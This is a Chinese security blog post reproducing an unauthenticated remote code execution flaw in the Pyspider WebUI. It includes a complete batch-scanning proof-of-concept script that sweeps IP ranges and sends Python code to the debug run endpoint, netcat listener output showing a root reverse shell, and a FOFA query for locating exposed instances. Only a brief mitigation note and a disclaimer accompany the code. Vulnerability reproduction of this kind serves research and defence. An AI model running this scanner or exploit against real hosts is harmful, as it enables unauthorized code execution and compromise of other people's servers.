Pyspider webui未授权访问导致RCE

admin

142235
文章

117
评论

2024年7月15日13:34:51评论68 views字数 2542阅读8分28秒阅读模式

影响范围

Pyspider webui

基本介绍

Pyspider是一个采用Python语言编写的爬虫系统，功能非常强大，它采用分布式架构，支持多种数据库后端，强大的WebUI支持脚本编辑器，任务监视器，项目管理器以及结果查看器，而偏偏有些开发人员把这个webui开到公网上面，而webui本身没有任何形式的验证机制并且允许远程执行python代码

漏洞检测

python3 poc.py

Pyspider webui未授权访问导致RCE

反弹shell

python3 exp.py

Pyspider webui未授权访问导致RCE

成功反弹shell：

root@amazing-idea-7:~# nc -lvp 4444Listening on [0.0.0.0] (family 0, port 4444)Connection fromm 45348 received!/home/ubuntuCommand Execution Completed!/nome/uwuntuwhoamirootpwd/home/ubunt/home/ubuntu/home/ubuntuls41154.shLifExp.classTryCMD.classdatafrp_0.32.1_linux_amd64.tar.gzgoby-linux-x64-1.7.186goby-Linux-x64-1.7.186.zipLinuxprivchecker.pyshadowsocks. logshadowsocks.shv2ray.sh网络安全招生zip/home/ubunturoot@amazing-idea-7:~#

Pyspider webui未授权访问导致RCE

漏洞POC

import IPyimport requestsimport datetimedef check_fast(ip,port):    '''    fast check     check title only    '''    url="http://"+ip+":"+str(port)    try:        r=requests.get(url=url,timeout=1)        if '''<a class="btn btn-default btn-info" href='/tasks' target=_blank>Recent Active Tasks</a>''' in r.text:            return True    except Exception:        return False    return Falsedef check_accurate(ip,port):    '''    accurate check    check if python script can be executed    '''    url="http://"+ip+":"+str(port)+"/debug/pyspidervulntest/run"    headers={"Content-Type": "application/x-www-form-urlencoded"}    data='''    webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D    '''    try:        r=requests.post(url=url,data=data,headers=headers,timeout=1)        if  '"logs": "pyspidervulnerable\n"' in r.text:            return True    except Exception:        return False    return Falsedef main():    print("Pyspider 未授权访问批量扫描器")    print("本扫描器仅供希望检查自己网络的安全性的管理员使用")    print("[1]精准扫描")    print("[2]快速扫描")    opt=input("选择扫描模式:")    if str(opt).strip()=="1":        scan_func=check_accurate    else:        scan_func=check_fast    ipstart=int(IPy.IP(str(input("请输入起始ip:"))).strHex(),16)    ipstop=int(IPy.IP(str(input("请输入结束ip:"))).strHex(),16)    f=open("result.txt","a")    f.write("pyspider未授权访问漏洞扫描报告n扫描时间:"+datetime.datetime.now().strftime('%Y-%m-%d')+"n存在漏洞的主机如下:n")    count=0    for ip in range(ipstart,ipstop+1):        ip=str(IPy.IP(ip))        if scan_func(ip,"5000"):            print("x1b[31m"+"[-]",ip,"存在漏洞"+"x1b[39m")            f.write(ip+"n")            count+=1        else:            print("[*]",ip,"不存在漏洞")    print("扫描完毕，共发现"+str(count)+"台主机存在漏洞")     f.write("扫描完毕，共发现"+str(count)+"台主机存在漏洞")     f.close()    print("扫描结果已经存到result.txt")if __name__ == "__main__":   main()

资产测绘

FOFA:

title="Dashboard - pyspider"

安全建议

关闭对外开放的webui~

原文始发于微信公众号（七芒星实验室）：【漏洞复现】Pyspider webui未授权访问导致RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Pyspider webui未授权访问导致RCE

Langflow code代码执行漏洞（CVE-2025-3248）

CVE-2025-30208&31125：Vite任意文件读取漏洞

Next.js 中的严重漏洞可让黑客绕过授权

Google Chrome沙箱逃逸漏洞

Vite 任意文件访问漏洞(CVE-2025-32395)

DedeCMS V110最新版RCE-Tricks

Jenkins Docker 镜像中存在漏洞 (CVE-2025-32754, CVE-2025-32755)

YesWiki 任意文件读取漏洞（CVE-2025-31131）

帆软报表 /view/ReportServer SQL注入漏洞 POC

Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞 POC

发表评论

在线咨询

微信